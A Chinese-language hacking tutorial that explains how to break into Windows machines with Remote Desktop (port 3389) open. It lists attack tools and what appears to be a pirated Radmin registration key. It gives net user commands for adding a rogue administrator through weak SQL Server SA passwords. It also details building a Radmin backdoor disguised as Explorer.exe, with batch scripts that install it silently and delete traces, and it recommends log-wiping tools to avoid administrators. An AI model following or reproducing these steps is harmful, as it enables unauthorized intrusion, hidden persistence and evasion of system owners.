高手解析如何入侵3389

这是本人多年下来的经验。

工具:WINNTAutoAttack自动攻击器（扫漏洞）；SQLTOOLS（SA空口令连接器）；RAMDIN影子3.0中文版（远程控制程序）（RADMIN注册码:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23）；SC.exe port.bat query.exe quser.exe（隐藏3389服务及不让管理发现自己程序）；CleanIISLog.exe（小榕的擦PP程序）；3389.exe（开3389端口服务的）；psu.exe（使用被禁止的Guest帐户要用到的）；mstsc.exe（远程桌面连接程序）。

一.扫到SA弱口令(自动攻击器)

二.用SQLTOOLS连上去建一个用户

net start telnet
开telnet服务
net user mint mint /add
添加用户mint密码为
mint net localgroup administrators mint /add
将帐号mint升级为管理员

三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)

制作RAD.EXE过程:

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe；

2、在本地设置服务端（一定要生成）；

设置密码-->>设置连接端口(默认4489)-->>生成

3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg；

4、编写一个批处理，并命名为u.bat；

@echo offnet stop r_server

5、写第二个批处理，r.bat,内容为：

@echo off@Explorer.exe /
uninstall /silence@Explorer.exe /install /
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /
silence@Explorer.exe /install /silence@regedit /
s 1.reg@net start r_server@del
rad.exe@del 1.reg@del r.bat@del u.bat

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包；